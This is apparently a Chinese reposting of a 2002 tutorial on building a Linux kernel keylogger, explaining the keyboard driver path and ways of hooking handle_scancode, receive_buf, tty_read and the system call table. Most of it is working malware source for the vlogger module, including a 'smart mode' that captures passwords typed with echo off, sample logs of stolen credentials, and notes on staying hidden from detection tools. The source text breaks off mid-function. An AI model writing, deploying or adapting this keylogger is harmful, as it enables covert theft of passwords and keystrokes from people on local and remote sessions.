首页 电脑 电脑学堂 查看内容

书写基于内核的linux键盘纪录器

2004-9-29 20:05 912 0

摘要: 整理:e4gle(大鹰) 来源http://www.whitecell.org |=-----------------=[ Writing Linux Kernel Keylogger ]=-----...
关键词: tty struct 函数 define receive char int 键盘 buf scancode

整理:e4gle(大鹰) 来源http://www.whitecell.org |=-----------------=[ Writing Linux Kernel Keylogger ]=------------------=||=-----------------------------------------------------------------------=||=------------------=[ rd ]=-------------------=||=------------------------=[ June 19th, 2002 ]=--------------------------=||=------------------=[ 整理:e4gle from whitecell.org]=-------------------=||=------------------------=[ Aug 12th, 2002 ]=--------------------------=|--[ Contents1 - 介绍2 - linux的keyboard驱动是如何工作的3 - 基于内核的键盘纪录的原理3.1 - 中断句柄3.2 - 函数劫持3.2.1 - 劫持handle_scancode3.2.2 - 劫持put_queue3.2.3 - 劫持receive_buf3.2.4 - 劫持tty_read3.2.5 - 劫持sys_read/sys_write4 - vlogger4.1 - 工作原理4.2 - 功能及特点4.3 - 如何使用5 - 感谢6 - 参考资料7 - Keylogger源代码--[ 1 - 介绍本文分成两个部分。第一部分给出了linux键盘驱动的工作原理,并且讨论了建立一个基于内核的键盘纪录器的方法。这部分内容对那些想写一个基于内核的键盘纪录器,或者写一个自己键盘驱动的朋友会有帮助。第二部分详细描述了vlogger的每个细节,vlogger是一个强大的基于内核的linux键盘纪录器,以及如何来使用它。这向技术可以运用在蜜罐系统中,也可以做成一些很有意思的hacker game,主要用来分析和采集hacker的攻击手法。我们都知道,一些大家熟知的键盘纪录器,如iob,uberkey,unixkeylogger等,它们是基于用户层的。这里介绍的是基于内核层的键盘纪录器。最早期的基于内核的键盘纪录器是linspy,它发表在phrack杂志第50期。而现代的kkeylogger(后面我们将用kkeylogger来表示基于内核的键盘纪录器)广泛采用的手法是中断sys_read或者sys_write系统调用来对用户的击键进行记录。显然,这种方法是很不稳定的并且会明显的降低系统的速度,因为我们中断的恰恰是系统使用最频繁的两个系统调用sys_read,sys_write;sys_read在每个进程需要读写设备的时候都会用到。在vlogger里,我用了一个更好的方法,就是劫持tty buffer进程函数,下面会介绍到。我假定读者熟悉linux的可加载模块的原理和运作过程,如果不熟悉,推荐大家首先阅读我以前写过的linux kernel simple hacking,或者linux tty hijack,(http://e4gle.org有下载),参阅《linux驱动程序设计》来获得相关的理论基础知识。--[ 2 - linux键盘驱动的工作原理首先让我们通过以下的结构图来了解一下用户从终端的击键是如何工作的:_____________ _________ _________ / \ put_queue| |receive_buf| |tty_read/handle_scancode\-------->|tty_queue|---------->|tty_ldisc|------->\ / | | |buffer | \_____________/ |_________| |_________| _________ ____________| |sys_read| |--->|/dev/ttyX|------->|user process|| | | ||_________| |____________|Figure 1首先,当你输入一个键盘值的时候,键盘将会发送相应的scancodes给键盘驱动。一个独立的击键可以产生一个六个scancodes的队列。键盘驱动中的handle_scancode()函数解析scancodes流并通过kdb_translate()函数里的转换表(translation-table)将击键事件和键的释放事件(key release events)转换成连续的keycode。比如,"a"的keycode是30。击键’a"的时候便会产生keycode 30。释放a键的时候会产生keycode 158(128+30)。然后,这些keycode通过对keymap的查询被转换成相应key符号。这步是一个相当复杂的过程。以上操作之后,获得的字符被送入raw tty队列--tty_flip_buffer。receive_buf()函数周期性的从tty_flip_buffer中获得字符,然后把这些字符送入tty read队列。当用户进程需要得到用户的输入的时候,它会在进程的标准输入(stdin)调用read()函数。sys_read()函数调用定义在相应的tty设备(如/dev/tty0)的file_operations结构中指向tty_read的read()函数来读取字符并且返回给用户进程。/*e4gle addfile_operations是文件操作结构,定义了文件操作行为的成员,结构如下,很容易理解:struct file_operations {struct module *owner;loff_t (*llseek) (struct file *, loff_t, int);ssize_t (*read) (struct file *, char *, size_t, loff_t *);ssize_t (*write) (struct file *, const char *, size_t, loff_t *);int (*readdir) (struct file *, void *, filldir_t);unsigned int (*poll) (struct file *, struct poll_table_struct *);int (*ioctl) (struct inode *, struct file *, unsigned int, unsigned long);int (*mmap) (struct file *, struct vm_area_struct *);int (*open) (struct inode *, struct file *);int (*flush) (struct file *);int (*release) (struct inode *, struct file *);int (*fsync) (struct file *, struct dentry *, int datasync);int (*fasync) (int, struct file *, int);int (*lock) (struct file *, int, struct file_lock *);ssize_t (*readv) (struct file *, const struct iovec *, unsigned long, loff_t *);ssize_t (*writev) (struct file *, const struct iovec *, unsigned long, loff_t *);ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);};我们直到unix系统中设备也是文件,所以tty设备我们也可以进行文件操作。*/键盘驱动器可以有如下4种模式:- scancode(RAW模式):应用程序取得输入的scancode。这种模式通常用于应用程序实现自己的键盘驱动器,比如X11程序。- keycode(MEDIUMRAW模式):应用程序取得key的击键和释放行为(通过keycode来鉴别这两种行为)信息。- ASCII(XLATE模式):应用程序取得keymap定义的字符,该字符是8位编码的。- Unicode(UNICODE模式):此模式唯一和ASCII模式不同之处就是UNICODE模式允许用户将自己的10进制值编写成UTF8的unicode字符,如十进制的数可以编写成Ascii_0到Ascii_9,或者用户16进制的值可以用Hex_0到Hex_9来代表。一个keymap可以产生出一系列UTF8的序列。以上这些驱动器的工作模式决定了应用程序所取得的键盘输入的数据类型。大家如果需要详细了解scancode,keycode和keymaps的相关信息,参看read[3]。--[ 3 - 基于内核的键盘纪录器的实现步骤我们论述两种实现方法,一个是书写我们自己的键盘中断句柄,另一个是劫持输入进程函数.----[ 3.1 - 中断句柄要纪录击键信息,我们就要利用我们自己的键盘中断。在Intel体系下,控制键盘的IRQ值是1。当接受到一个键盘中断时,我们的键盘中断器会读取scancode和键盘的状态。读写键盘事件都是通过0x60端口(键盘数据注册器)和0x64(键盘状态注册器)来实现的。/* 以下代码都是intel格式 */#define KEYBOARD_IRQ 1 #define KBD_STATUS_REG 0x64 #define KBD_CNTL_REG 0x64 #define KBD_DATA_REG 0x60 #define kbd_read_input() inb(KBD_DATA_REG) #define kbd_read_status() inb(KBD_STATUS_REG) #define kbd_write_output(val) outb(val, KBD_DATA_REG) #define kbd_write_command(val) outb(val, KBD_CNTL_REG) /* 注册我们的IRQ句柄*/request_irq(KEYBOARD_IRQ, my_keyboard_irq_handler, 0, "my keyboard", NULL);在my_keyboard_irq_handler()函数中定义如下:scancode = kbd_read_input(); key_status = kbd_read_status(); log_scancode(scancode);这种方法不方便跨平台操作。而且很容易crash系统,所以必须小心操作你的终端句柄。----[ 3.2 - 函数劫持在第一种思路的基础上,我们还可以通过劫持handle_scancode(),put_queue(),receive_buf(),tty_read()或者sys_read()等函数来实现我们自己的键盘纪录器。注意,我们不能劫持tty_insert_flip_char()函数,因为它是一个内联函数。------[ 3.2.1 - handle_scancode函数它是键盘驱动程序中的一个入口函数(有兴趣可以看内核代码keynoard.c)。# /usr/src/linux/drives/char/keyboard.cvoid handle_scancode(unsigned char scancode, int down);我们可以这样,通过替换原始的handle_scancode()函数来实现纪录所有的scancode。这就我们在lkm后门中劫持系统调用是一个道理,保存原来的,把新的注册进去,实现我们要的功能,再调用回原来的,就这么简单。就是一个内核函数劫持技术。/* below is a code snippet written by Plasmoid */static struct semaphore hs_sem, log_sem;static int logging=1;#define CODESIZE 7static char hs_code[CODESIZE];static char hs_jump[CODESIZE] ="\xb8\x00\x00\x00\x00" /* movl $0,%eax */"\xff\xe0" /* jmp *%eax */;void (*handle_scancode) (unsigned char, int) =(void (*)(unsigned char, int)) HS_ADDRESS;void _handle_scancode(unsigned char scancode, int keydown){if (logging && keydown)log_scancode(scancode, LOGFILE);/*恢复原始handle_scancode函数的首几个字节代码。调用恢复后的原始函数并且*再次恢复跳转代码。*/down(&hs_sem);memcpy(handle_scancode, hs_code, CODESIZE);handle_scancode(scancode, keydown);memcpy(handle_scancode, hs_jump, CODESIZE);up(&hs_sem);}HS_ADDRESS这个地址在执行Makefile文件的时候定义:HS_ADDRESS=0x$(word 1,$(shell ksyms -a | grep handle_scancode))其实就是handle_scancode在ksyms导出的地址。类似3.1节中提到的方法,这种方法对在X和终端下纪录键盘击键也很有效果,和是否调用tty无关。这样你就可以纪录下键盘上的正确的击键行为了(包括一些特殊的key,如ctrl,alt,shift,print screen等等)。但是这种方法也是不能跨平台操作,毕竟是靠lkm实现的。同样它也不能纪录远程会话的击键并且也很难构成相当复杂的高级纪录器。------[ 3.2.2 - put_queue函数handle_scancode()函数会调用put_queue函数,用来将字符放入tty_queue。/*e4gle addput_queue函数在内核中定义如下:void put_queue(int ch){wake_up(&keypress_wait);if (tty) {tty_insert_flip_char(tty, ch, 0);con_schedule_flip(tty);}}*/# /usr/src/linux/drives/char/keyboard.cvoid put_queue(int ch);劫持这个函数,我们可以利用和上面劫持handle_scancode函数同样的方法。------[ 3.2.3 - receive_buf函数底层tty驱动调用receive_buf()这个函数用来发送硬件设备接收处理的字符。# /usr/src/linux/drivers/char/n_tty.c */static void n_tty_receive_buf(struct tty_struct *tty, const unsigned char *cp, char *fp, int count)参数cp是一个指向设备接收的输入字符的buffer的指针。参数fp是一个指向一个标记字节指针的指针。让我们深入的看一看tty结构# /usr/include/linux/tty.hstruct tty_struct {int magic;struct tty_driver driver;struct tty_ldisc ldisc;struct termios *termios, *termios_locked;...}# /usr/include/linux/tty_ldisc.hstruct tty_ldisc {int magic;char *name;... void (*receive_buf)(struct tty_struct *, const unsigned char *cp, char *fp, int count);int (*receive_room)(struct tty_struct *);void (*write_wakeup)(struct tty_struct *);};要劫持这个函数,我们可以先保存原始的tty receive_buf()函数,然后重置ldisc.receive_buf到我们的new_receive_buf()函数来记录用户的输入。举个例子:我们要记录在tty0设备上的输入。int fd = open("/dev/tty0", O_RDONLY, 0);struct file *file = fget(fd);struct tty_struct *tty = file->private_data;old_receive_buf = tty->ldisc.receive_buf; //保存原始的receive_buf()函数tty->ldisc.receive_buf = new_receive_buf; //替换成新的new_receive_buf函数//新的new_receive_buf函数void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, char *fp, int count){ logging(tty, cp, count); //纪录用户击键/* 调用回原来的receive_buf */(*old_receive_buf)(tty, cp, fp, count);}/*e4gle add其实这里新的new_receive_buf函数只是做了个包裹,技术上实现大同小异,包括劫持系统调用内核函数等,技术上归根都比较简单,难点在于如何找到切入点,即劫持哪个函数可以达到目的,或者效率更高更稳定等,这就需要深入了解这些内核函数的实现功能。*/------[ 3.2.4 - tty_read函数当一个进程需要通过sys_read()函数来读取一个tty终端的输入字符的时候,tty_read函数就会被调用。# /usr/src/linux/drives/char/tty_io.cstatic ssize_t tty_read(struct file * file, char * buf, size_t count, loff_t *ppos)static struct file_operations tty_fops = {llseek: tty_lseek,read: tty_read,write: tty_write,poll: tty_poll,ioctl: tty_ioctl,open: tty_open,release: tty_release,fasync: tty_fasync,};还是举上面的纪录来自tty0的输入信息的例子:int fd = open("/dev/tty0", O_RDONLY, 0);struct file *file = fget(fd); old_tty_read = file->f_op->read; //保存原来的tty_readfile->f_op->read = new_tty_read; //替换新的tty_read函数/*e4gle add劫持这个函数的具体实现代码就不多说了,和上面是一样的,我这里写出来给大家参考一下:static ssize_t new_tty_read(struct file * file, char * buf, size_t count, loff_t *ppos){struct tty_struct *tty = file->private_data; logging(tty, buf, count); //纪录用户击键/* 调用回原来的tty_read */(*old_tty_read)(file, buf, count, ppos);}*/------[ 3.2.5 - sys_read/sys_write函数截获sys_read/sys_write这两个系统调用来实现的技术我不说了,在很早的quack翻译的“linux内核可加载模块编程完全指南”中就提到了这种技术,在我写的“linux kernel hacking”若干教程中也明明白白反反复复提到过,phrack杂志也早在50期的第四篇文章里也介绍到,如果大家不明白请参考以上文献。我提供以下code来实现劫持sys_read和sys_write系统调用:extern void *sys_call_table[];original_sys_read = sys_call_table[__NR_read];sys_call_table[__NR_read] = new_sys_read;当然除了替换sys_call_table表之外还有很多方法,在phrack59中的高级kernel hacking一文中详细针对现有的几种劫持系统调用的方法有演示代码,这里不多做介绍了。--[ 4 - vlogger这节介绍一下一个内核键盘纪录器vlogger,是本文的原作者的大作,它是通过3.2.3节中介绍的方法来实现纪录用户击键的,也利用了劫持sys_read/sys_write系统调用来做补充。vlogger在如下内核中测试通过:2.4.5,2.4.7,2.4.17,2.4.18。----[ 4.1 - 步骤要记录下本地(纪录终端的信息)和远程会话的键盘击键 ,我选择劫持receive_buf函数的方法(见3.2.3节)。在内核中,tty_struct和tty_queue结构仅仅在tty设备打开的时候被动态分配。因而,我们同样需要通过劫持sys_open系统调用来动态的hooking这些每次调用时的每个tty或pty的receive_buf()函数。// 劫持sys_open调用original_sys_open = sys_call_table[__NR_open];sys_call_table[__NR_open] = new_sys_open;// new_sys_open()asmlinkage int new_sys_open(const char *filename, int flags, int mode){...//调用original_sys_openret = (*original_sys_open)(filename, flags, mode);if (ret >= 0) {struct tty_struct * tty;...file = fget(ret);tty = file->private_data;if (tty != NULL && ...tty->ldisc.receive_buf != new_receive_buf) {...// 保存原来的receive_buf old_receive_buf = tty->ldisc.receive_buf;.../* * 开始劫持该tty的receive_buf函数* tty->ldisc.receive_buf = new_receive_buf;*/init_tty(tty, TTY_INDEX(tty));}...}// 我们的新的receive_buf()函数void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, char *fp, int count){if (!tty->real_raw && !tty->raw) // 忽略 raw模式// 调用我们的logging函数来记录用户击键vlogger_process(tty, cp, count); // 调用回原来的receive_buf(*old_receive_buf)(tty, cp, fp, count);}----[ 4.2 - 功能及特点- 可以记录本地和远程会话的所有击键(通过tty和pts)- 按每个tty/会话分开纪录。每个tty都有他们自己的纪录缓冲区。- 几乎支持所有的特殊键如方向键(left,riht,up,down),F1到F12,Shift+F1到Shift+F12,Tab,Insert,Delete,End,Home,Page Up,Page Down,BackSpace,等等- 支持一些行编辑键包括ctrl-U和BackSpace键等。- 时区支持- 多种日志模式o dumb模式: 纪录所有的击键行为o smart模式: 只记录用户名/密码。这里我用了solar designer和dug song的"Passive Analysisof SSH (Secure Shell) Traffic"文章中的一个小技术来实现的。当应用程序返回的输入回显关闭的时候(就是echo -off),就认为那是用户在输入密码,我们过滤下来就是了:)o normal模式: 禁止纪录用户可以通过利用MAGIC_PASS宏和VK_TOGLE_CHAR宏(MAGIC_PASS这个宏定义了切换密码,VK_TOGLE_CHAR定义了一个keycode来做为切换热键)来切换日志模式。#define VK_TOGLE_CHAR 29 // CTRL-]#define MAGIC_PASS "31337" //要切换日志模式,输入MAGIC_PASS,然后敲击VK_TOGLE_CHAR键----[ 4.3 - 如何使用以下是一些可改变的选项// 日志存放路径的宏#define LOG_DIR "/tmp/log"// 本地的时区#define TIMEZONE 7*60*60 // GMT+7// 切换日志模式的密码的宏#define MAGIC_PASS "31337" 以下列出了纪录后的日志目录结构:[e4gle@redhat72 log]# ls -ltotal 60-rw------- 1 root root 633 Jun 19 20:59 pass.log-rw------- 1 root root 37593 Jun 19 18:51 pts11-rw------- 1 root root 56 Jun 19 19:00 pts20-rw------- 1 root root 746 Jun 19 20:06 pts26-rw------- 1 root root 116 Jun 19 19:57 pts29-rw------- 1 root root 3219 Jun 19 21:30 tty1-rw------- 1 root root 18028 Jun 19 20:54 tty2---在dumb模式中[e4gle@redhat72 log]# head tty2 //本地会话 pwd uname -a lsmod pwd cd /var/log tail messages cd ~ ls tty [UP][e4gle@redhat72 log]# tail pts11 // 远程会话 cd new cp -p ~/code . lsmod cd /va[TAB][^H][^H]tmp/log/ ls -l tail pts11 [UP] | more vi vlogertxt :q rmmod vlogger---在smart模式中[e4gle@redhat72 log]# cat pass.log[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]USER/CMD sudo traceroute yahoo.comPASS 5hgt6dPASS [19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]USER/CMD ssh [email protected] guest[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]USER/CMD open ftp.ilog.frUSER AnonymousPASS heh@heh[19/06/2002-20:59:54 tty=pts/29 uid=504 su]USER/CMD su -PASS asdf1234--[ 5 - 感谢 感谢plasmoid, skyper的大力帮助,感谢THC,vnsecurity等组织的所有朋友们。最后,感谢thang先生的英文翻译。//e4gle add到此,全文介绍完了,大家有兴趣可以试试代码,其实这里涉及的技术无非还是系统调用和内核函数的劫持技术,我整理过的一篇tty劫持的文章,大家也可以对比一下。其实vlogger也有一定的缺陷,它还是通过sys_call_table的方法来劫持系统调用open的,那很容易被kstat等工具发现,关于更隐藏的劫持技术在phrack59的advance kernel hacking一文里有5个例子详细介绍了更多的办法,大家可以参考这些文献。--[ 6 - 参考资料[1] Linux Kernel Module Programminghttp://www.tldp.org/LDP/lkmpg/[2] Complete Linux Loadable Kernel Modules - Pragmatichttp://www.thehackerschoice.com/papers/LKM_HACKING.html[3] The Linux keyboard driver - Andries Brouwerhttp://www.linuxjournal.com/lj-issues/issue14/1080.html[4] Abuse of the Linux Kernel for Fun and Profit - Halflifehttp://www.phrack.com/phrack/50/P50-05[5] Kernel function hijacking - Silvio Cesarehttp://www.big.net.au/~silvio/kernel-hijack.txt[6] Passive Analysis of SSH (Secure Shell) Traffic - Solar Designer http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt[7] Kernel Based Keylogger - Mercenaryhttp://packetstorm.decepticons.org/UNIX/security/kernel.keylogger.txt--[ 7 - Keylogger的源代码 vlogger/Makefile## vlogger 1.0 by rd## LOCAL_ONLY logging local session only. Doesn"t intercept# sys_open system call# DEBUG Enable debug. Turn on this options will slow# down your system#KERNELDIR =/usr/src/linuxinclude $(KERNELDIR)/.configMODVERFILE = $(KERNELDIR)/include/linux/modversions.hMODDEFS = -D__KERNEL__ -DMODULE -DMODVERSIONSCFLAGS = -Wall -O2 -I$(KERNELDIR)/include -include $(MODVERFILE) \-Wstrict-prototypes -fomit-frame-pointer -pipe \-fno-strength-reduce -malign-loops=2 -malign-jumps=2 \-malign-functions=2all : vlogger.ovlogger.o: vlogger.c$(CC) $(CFLAGS) $(MODDEFS) -c $^ -o $@clean:rm -f *.o vlogger/vlogger.c/** vlogger 1.0** Copyright (C) 2002 rd ** Please checkhttp://www.thehackerschoice.com/ for update** This program is free software; you can redistribute it and/or modify* it under the terms of the GNU General Public License as published by* the Free Software Foundation; either version 2 of the License, or* (at your option) any later version** This program is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details.** Greets to THC & vnsecurity**/#define __KERNEL_SYSCALLS__#include #include #include #include #include #include #include #include #include #include #include #include #ifndef KERNEL_VERSION#define KERNEL_VERSION(a,b,c) (((a) #endif#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)MODULE_LICENSE("GPL");MODULE_AUTHOR("[email protected]");#endif#define MODULE_NAME "vlogger "#define MVERSION "vlogger 1.0 - by [email protected]\n"#ifdef DEBUG#define DPRINT(format, args...) printk(MODULE_NAME format, ##args)#else#define DPRINT(format, args...)#endif#define N_TTY_NAME "tty"#define N_PTS_NAME "pts"#define MAX_TTY_CON 8#define MAX_PTS_CON 256#define LOG_DIR "/tmp/log"#define PASS_LOG LOG_DIR "/pass.log"#define TIMEZONE 7*60*60 // GMT+7#define ESC_CHAR 27#define BACK_SPACE_CHAR1 127 // local#define BACK_SPACE_CHAR2 8 // remote#define VK_TOGLE_CHAR 29 // CTRL-]#define MAGIC_PASS "31337" // to switch mode, press MAGIC_PASS and // VK_TOGLE_CHAR#define VK_NORMAL 0#define VK_DUMBMODE 1#define VK_SMARTMODE 2#define DEFAULT_MODE VK_DUMBMODE#define MAX_BUFFER 256#define MAX_SPECIAL_CHAR_SZ 12#define TTY_NUMBER(tty) MINOR((tty)->device) - (tty)->driver.minor_start \+ (tty)->driver.name_base#define TTY_INDEX(tty) tty->driver.type == \TTY_DRIVER_TYPE_PTY?MAX_TTY_CON + \TTY_NUMBER(tty):TTY_NUMBER(tty)#define IS_PASSWD(tty) L_ICANON(tty) && !L_ECHO(tty)#define TTY_WRITE(tty, buf, count) (*tty->driver.write)(tty, 0, \buf, count)#define TTY_NAME(tty) (tty->driver.type == \TTY_DRIVER_TYPE_CONSOLE?N_TTY_NAME: \tty->driver.type == TTY_DRIVER_TYPE_PTY && \tty->driver.subtype == PTY_TYPE_SLAVE?N_PTS_NAME:"")#define BEGIN_KMEM { mm_segment_t old_fs = get_fs(); set_fs(get_ds());#define END_KMEM set_fs(old_fs); }extern void *sys_call_table[];int errno;struct tlogger {struct tty_struct *tty;char buf[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ];int lastpos;int status;int pass;};struct tlogger *ttys[MAX_TTY_CON + MAX_PTS_CON] = { NULL };void (*old_receive_buf)(struct tty_struct *, const unsigned char *,char *, int);asmlinkage int (*original_sys_open)(const char *, int, int);int vlogger_mode = DEFAULT_MODE;/* Prototypes */static inline void init_tty(struct tty_struct *, int);/*static char *_tty_make_name(struct tty_struct *tty, const char *name, char *buf){int idx = (tty)?MINOR(tty->device) - tty->driver.minor_start:0;if (!tty) strcpy(buf, "NULL tty");elsesprintf(buf, name,idx + tty->driver.name_base);return buf;}char *tty_name(struct tty_struct *tty, char *buf){return _tty_make_name(tty, (tty)?tty->driver.name:NULL, buf);}*/#define SECS_PER_HOUR (60 * 60)#define SECS_PER_DAY (SECS_PER_HOUR * 24)#define isleap(year) \((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0))#define DIV(a, b) ((a) / (b) - ((a) % (b) #define LEAPS_THRU_END_OF(y) (DIV (y, 4) - DIV (y, 100) + DIV (y, 400))struct vtm {int tm_sec;int tm_min;int tm_hour;int tm_mday;int tm_mon;int tm_year;};/* * Convert from epoch to date */int epoch2time (const time_t *t, long int offset, struct vtm *tp){static const unsigned short int mon_yday[2][13] = {/* Normal years. */{ 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 },/* Leap years. */{ 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 }};long int days, rem, y;const unsigned short int *ip;days = *t / SECS_PER_DAY;rem = *t % SECS_PER_DAY;rem += offset;while (rem rem += SECS_PER_DAY;--days;}while (rem >= SECS_PER_DAY) {rem -= SECS_PER_DAY;++days;}tp->tm_hour = rem / SECS_PER_HOUR;rem %= SECS_PER_HOUR;tp->tm_min = rem / 60;tp->tm_sec = rem % 60;y = 1970;while (days = (isleap (y) ? 366 : 365)) {long int yg = y + days / 365 - (days % 365 days -= ((yg - y) * 365+ LEAPS_THRU_END_OF (yg - 1)- LEAPS_THRU_END_OF (y - 1));y = yg;}tp->tm_year = y - 1900;if (tp->tm_year != y - 1900)return 0;ip = mon_yday[isleap(y)];for (y = 11; days continue;days -= ip[y];tp->tm_mon = y;tp->tm_mday = days + 1;return 1;}/* * Get current date & time*/void get_time (char *date_time) {struct timeval tv;time_t t;struct vtm tm;do_gettimeofday(&tv);t = (time_t)tv.tv_sec;epoch2time(&t, TIMEZONE, &tm);sprintf(date_time, "%.2d/%.2d/%d-%.2d:%.2d:%.2d", tm.tm_mday,tm.tm_mon + 1, tm.tm_year + 1900, tm.tm_hour, tm.tm_min,tm.tm_sec);}/* * Get task structure from pgrp id*/inline struct task_struct *get_task(pid_t pgrp) {struct task_struct *task = current;do {if (task->pgrp == pgrp) {return task;}task = task->next_task;} while (task != current);return NULL;}#define _write(f, buf, sz) (f->f_op->write(f, buf, sz, &f->f_pos))#define WRITABLE(f) (f->f_op && f->f_op->write)int write_to_file(char *logfile, char *buf, int size){int ret = 0;struct file *f = NULL;lock_kernel();BEGIN_KMEM;f = filp_open(logfile, O_CREAT|O_APPEND, 00600);if (IS_ERR(f)) {DPRINT("Error %ld opening %s\n", -PTR_ERR(f), logfile);ret = -1;} else {if (WRITABLE(f))_write(f, buf, size);else {DPRINT("%s does not have a write method\n",logfile);ret = -1;}if ((ret = filp_close(f,NULL)))DPRINT("Error %d closing %s\n", -ret, logfile);}END_KMEM;unlock_kernel();return ret;}#define BEGIN_ROOT { int saved_fsuid = current->fsuid; current->fsuid = 0;#define END_ROOT current->fsuid = saved_fsuid; }/* * Logging keystrokes*/void logging(struct tty_struct *tty, struct tlogger *tmp, int cont) {int i;char logfile[256];char loginfo[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ + 256];char date_time[24];struct task_struct *task;if (vlogger_mode == VK_NORMAL)return;if ((vlogger_mode == VK_SMARTMODE) && (!tmp->lastpos || cont))return;task = get_task(tty->pgrp);for (i=0; ilastpos; i++)if (tmp->buf[i] == 0x0D) tmp->buf[i] = 0x0A;if (!cont) tmp->buf[tmp->lastpos++] = 0x0A;tmp->buf[tmp->lastpos] = 0;if (vlogger_mode == VK_DUMBMODE) {snprintf(logfile, sizeof(logfile)-1, "%s/%s%d",LOG_DIR, TTY_NAME(tty), TTY_NUMBER(tty));BEGIN_ROOTif (!tmp->status) {get_time(date_time);if (task)snprintf(loginfo, sizeof(loginfo)-1,"
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部